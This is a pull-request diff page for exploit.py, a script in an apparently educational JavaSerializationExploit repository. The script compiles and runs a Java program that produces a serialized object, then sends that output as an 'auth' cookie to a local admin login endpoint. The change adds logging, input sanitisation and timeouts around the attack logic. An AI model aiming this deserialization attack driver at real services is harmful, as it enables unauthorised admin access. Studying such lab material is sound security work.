Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
128 changes: 118 additions & 10 deletions exploits/JavaSerializationExploit/src/main/java/exploit.py
Original file line number Diff line number Diff line change
@@ -1,14 +1,122 @@
import requests
from subprocess import Popen, PIPE
import subprocess
import shlex
import logging
import re
from typing import Tuple

def console(cmd):
p = Popen(cmd, shell=True, stdout=PIPE)
out, err = p.communicate()
return (p.returncode, out, err)
# Configure logging with proper formatter to prevent log injection
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
handlers=[
logging.FileHandler('application.log'),
logging.StreamHandler()
]
)
logger = logging.getLogger(__name__)

def sanitize_log_entry(message: str) -> str:
"""
Sanitize log entries to prevent log forging/injection attacks.
Removes newlines, carriage returns, and other control characters.
"""
if not isinstance(message, str):
message = str(message)

# Remove newlines, carriage returns, and other control characters
sanitized = re.sub(r'[\n\r\t\x00-\x1f\x7f-\x9f]', ' ', message)

# Limit length to prevent log overflow
max_length = 1000
if len(sanitized) > max_length:
sanitized = sanitized[:max_length] + "... [truncated]"

return sanitized

def console(cmd: str) -> Tuple[int, bytes, bytes]:
"""
Execute shell command safely without shell=True to prevent command injection.
Uses shlex to properly parse commands.
"""
try:
# Parse command safely using shlex to avoid shell injection
cmd_list = shlex.split(cmd)

# Execute without shell=True to prevent command injection
p = subprocess.Popen(
cmd_list,
shell=False,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=False
)
out, err = p.communicate(timeout=30) # Add timeout to prevent hanging

return (p.returncode, out, err)
except subprocess.TimeoutExpired:
p.kill()
logger.error("Command execution timed out")
return (-1, b"", b"Timeout expired")
except Exception as e:
logger.error(f"Command execution failed: {sanitize_log_entry(str(e))}")
return (-1, b"", str(e).encode())

def main():
try:
# Compile Java file
logger.info("Starting Java compilation")
compile_result = console("javac DoSerialize.java")

if compile_result[0] != 0:
error_msg = compile_result[2].decode('utf-8', errors='replace')
logger.error(f"Compilation failed: {sanitize_log_entry(error_msg)}")
return

logger.info("Compilation successful")

# Execute Java program
logger.info("Executing Java serialization")
cookieval = console("java DoSerialize")

if cookieval[0] != 0:
error_msg = cookieval[2].decode('utf-8', errors='replace')
logger.error(f"Java execution failed: {sanitize_log_entry(error_msg)}")
return

# Sanitize cookie value before logging
cookie_output = cookieval[1].strip()
logger.info(f"Cookie generated successfully (length: {len(cookie_output)} bytes)")

# Create cookie dictionary
cookie = {'auth': cookie_output.decode('utf-8', errors='replace')}

# Make HTTP request with timeout and proper error handling
logger.info("Sending authentication request")
r = requests.post(
'http://localhost:8081/admin/login',
cookies=cookie,
data=" ",
allow_redirects=True,
timeout=10,
verify=True # Enable SSL verification in production
)

# Sanitize response before logging
response_preview = r.text[:200] if len(r.text) > 200 else r.text
logger.info(f"Response status: {r.status_code}")
logger.debug(f"Response preview: {sanitize_log_entry(response_preview)}")

# Print response (sanitized for logging context)
print(sanitize_log_entry(r.text))

except requests.exceptions.Timeout:
logger.error("HTTP request timed out")
except requests.exceptions.RequestException as e:
logger.error(f"HTTP request failed: {sanitize_log_entry(str(e))}")
except Exception as e:
logger.error(f"Unexpected error: {sanitize_log_entry(str(e))}")

if __name__ == "__main__":
main()

console("javac DoSerialize.java")
cookieval = console("java DoSerialize")
cookie = {'auth': cookieval[1].strip()}
r = requests.post('http://localhost:8081/admin/login', cookies=cookie, data=" ",allow_redirects=True)
print r.text
Loading